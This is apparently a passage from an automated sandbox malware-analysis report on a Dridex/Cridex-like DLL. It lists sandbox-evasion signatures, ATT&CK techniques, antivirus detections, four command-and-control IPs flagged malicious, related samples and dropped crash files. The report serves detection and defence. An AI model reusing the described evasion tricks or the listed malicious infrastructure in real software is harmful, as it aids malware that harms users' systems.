Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1620

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1620

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EB60730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

1_2_6EB60730

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000008.00000002.324195341.00000000012B7000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.323676784.00000000012B7000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000002.324163790.0000000001280000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EB56D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6EB56D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EB63138 RtlAddVectoredExceptionHandler,

1_2_6EB63138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.821202137.0000000001370000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.303566822.0000000003880000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.302027964.0000000003880000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.821202137.0000000001370000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.303566822.0000000003880000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.302027964.0000000003880000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.821202137.0000000001370000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.303566822.0000000003880000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.302027964.0000000003880000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.821202137.0000000001370000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.303566822.0000000003880000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.302027964.0000000003880000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6EB56D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

1_2_6EB56D0C

Source: Amcache.hve.LOG1.8.dr, Amcache.hve.8.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.8.dr, Amcache.hve.8.dr	Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery31	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	24%	Virustotal		Browse
SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	26%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.rundll32.exe.6eb50000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
1.2.loaddll32.exe.2800000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.rundll32.exe.6eb50000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
1.2.loaddll32.exe.6eb50000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.0.rundll32.exe.31e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.rundll32.exe.6eb50000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.0.rundll32.exe.31e0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.31e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.n4pkg6fy8o.gaDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.8.dr	false		high
http://www.n4pkg6fy8o.gaDVarFileInfo$	loaddll32.exe, 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.302581940.000000006EB6F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544194
Start date:	22.12.2021
Start time:	20:24:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware1.11362.23809 (renamed file extension from 23809 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 52.3% (good quality ratio 50.7%) Quality average: 79.5% Quality standard deviation: 26.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 52.182.143.212 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
20:25:56	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
85.10.248.28	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
80.211.3.13	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.18811.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.22486.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f87e517ca7ba4e3ba229cb2ffa35583e25899a_82810a17_198b3aa3\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9219702689378206
Encrypted:	false
SSDEEP:	192:cuiz0oXCN/HBUZMX4jed+yL/u7sSS274ItWc:JitXCN/BUZMX4je3L/u7sSX4ItWc
MD5:	79CC54E8C141F5109F39A5F806AD2CEE
SHA1:	7845FDA8469C72F836649557F0F3A92455DE4236
SHA-256:	13C1D974F5EA0C00E96E1FBD52E5BC7A65776D8F0CFA0B5D14BC4848BB583022
SHA-512:	522D2795BDBE718752972297A7ADDD2BB4F31F3CF3E882BB4C79A100FC3E2125E6B9AE803AFFDF206A447E5F34DB1E74C2B3A28749C44F31F156BE951B4B7831
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.0.7.1.5.0.7.5.0.7.4.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.0.7.1.5.5.3.1.3.1.9.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.c.d.b.4.9.7.-.9.8.f.2.-.4.c.f.d.-.9.7.f.d.-.f.0.a.d.c.e.a.3.2.a.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.d.1.a.a.4.1.-.f.4.6.5.-.4.f.6.1.-.b.9.7.9.-.8.e.c.8.d.7.6.6.f.c.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.1.4.-.0.0.0.1.-.0.0.1.c.-.f.5.1.7.-.5.8.2.7.b.5.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2362.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 23 04:25:52 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	43000
Entropy (8bit):	2.2065773807704554
Encrypted:	false
SSDEEP:	192:xhBdSEcTQcJzZO5SkbmQcpxOlB/84P+ziet1gDI:x4JJY5LbpcpAlVUzieTgs
MD5:	85FB74CB0DB2B67D9BA3E9092034D4E9
SHA1:	7A9D86DE372B19FB2C89AE43D591BEA4B8074DF0
SHA-256:	559F0DFB85C8738298F6C4149ADDEB8F36F408564C06248EC38CEEBF297F537C
SHA-512:	68E63C068466EF527228F5DB0F9DF5099C07DF7B69207EFEC68FB67B7004E2A19FE8F9FC29B2E8EDD13A5D669AC89AB19C2BC577A268C82C4E8EDB16912B829D
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......P..a.........................................-..........T.......8...........T...............0............................................................................................U...........B...... .......GenuineIntelW...........T...........I..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A0A.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.6898439981167592
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi1e67OgksK6Yjx6SgmfT/CShCprY89bVOsf0pnm:RrlsNiM6A6Y16SgmfT/CScVNf9
MD5:	C6B41AF3498EF6E2E60EF50528E8154F
SHA1:	77F07D74EA2EF214CEB45DFD62AABA8AAFB00D23
SHA-256:	4E4E996FBD457F6077A79346F782B1CA500785D6C012E626F241C129F6BDF143
SHA-512:	D855A486DDC568D10689E92F0CC0773798E7D13307C4E62366B8EDE252761D07A995B17AF555B49F9841548D46F2E88E553D9C5B8A7F9EA2CC88D512FF810AEC
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C9B.tmp.xml Download File
